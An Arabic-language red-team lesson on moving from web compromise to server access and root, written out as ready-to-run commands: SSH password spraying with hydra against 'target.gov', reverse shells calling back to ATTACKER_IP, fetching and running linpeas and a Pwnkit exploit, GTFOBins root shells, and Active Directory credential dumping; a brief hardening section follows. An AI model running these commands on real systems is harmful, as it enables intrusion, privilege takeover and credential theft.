الفرق الحمراء — الهجومخبير90mL05
استغلال الخوادم وتصعيد الصلاحيات
طرق استغلال السيرفرات وتصعيد صلاحيات المستخدم
#RCE#SSH#LinPEAS#GTFOBins
من الويب إلى السيرفر — تنفيذ الأوامر
تشبيه — شرح مبسط
فتحنا الباب الأمامي للمتجر (الويب). الآن نريد الدخول للمستودع الخلفي (السيرفر) ثم لمكتب المدير (root). كل خطوة تتطلب «مفتاحاً» مختلفاً.
الوصول الأولي — Initial Foothold
- RCE عبر ثغرة ويب (سبق في الدرس السابق).
- SSH brute force / spraying.
- خدمة قديمة فيها CVE معروفة (Tomcat, Jenkins, GitLab).
- مفاتيح مسرّبة من GitHub.
SSH spray (authorized only)
hydra -L users.txt -p 'Summer2026!' ssh://target.gov -t 4 -f
crackmapexec ssh target.gov -u root -k id_rsa.leakedReverse Shell — قلب الاختراق
تشبيه — شرح مبسط
الـ firewall يمنع الاتصالات الواردة لكن يسمح بالخارجة. الحل: نجعل السيرفر هو الذي يتصل بنا.
bash
# على جهاز المهاجم
nc -lnvp 4444
# على الضحية
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("A",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")'
busybox nc ATTACKER 4444 -e shترقية الـ shell
upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl-Z
stty raw -echo; fg
export TERM=xterm-256colorرفع الصلاحيات — Linux Privilege Escalation
أتمتة الفحص
$ wget http://ATTACKER/linpeas.sh -O /tmp/p.sh && bash /tmp/p.sh
[+] SUID binaries:
/usr/bin/find — exploitable via GTFOBins
[!] Writable /etc/passwd
طرق شائعة لـ root
- SUID binaries — راجع GTFOBins.
- Sudo misconfiguration — sudo -l ثم استغلال.
- Writable /etc/passwd — أضف مستخدماً بكلمة معروفة.
- Cron jobs تشغّل سكربتاً أنت تستطيع تعديله.
- Kernel exploits — DirtyPipe (CVE-2022-0847), Pwnkit (CVE-2021-4034).
- Docker socket — /var/run/docker.sock mounted = root.
- Capabilities — cap_setuid على binary.
GTFOBins examples
find . -exec /bin/sh -p \; -quit
sudo vim -c ':!/bin/sh'
curl -sLO https://raw.githubusercontent.com/.../pwnkit.c && gcc pwnkit.c -o pk && ./pkرفع الصلاحيات — Windows
- winPEAS، PowerUp.ps1، Seatbelt.
- Unquoted Service Path.
- AlwaysInstallElevated.
- سرقة الـ tokens بـ Mimikatz / Rubeus.
- Kerberoasting — استخراج SPN ثم كسر بـ hashcat.
Active Directory
GetUserSPNs.py corp.local/user:pass -dc-ip DC -request
GetNPUsers.py corp.local/ -usersfile users.txt -no-pass
secretsdump.py -just-dc corp.local/admin@DCالدفاع: Server Hardening
- SSH: فقط مفاتيح، fail2ban، 2FA.
- إزالة كل SUID غير الضروري.
- تطبيق CIS Benchmarks.
- تفعيل auditd + شحن السجلات لـ SIEM.
- EDR مثل Wazuh / CrowdStrike / Defender for Endpoint.
- AppArmor / SELinux في وضع enforcing.
- تقسيم الشبكة لمنع الـ lateral movement.
قاعدة 1-10-60
CrowdStrike: اكتشاف خلال 1 دقيقة، تحقق خلال 10 دقائق، احتواء خلال 60 دقيقة.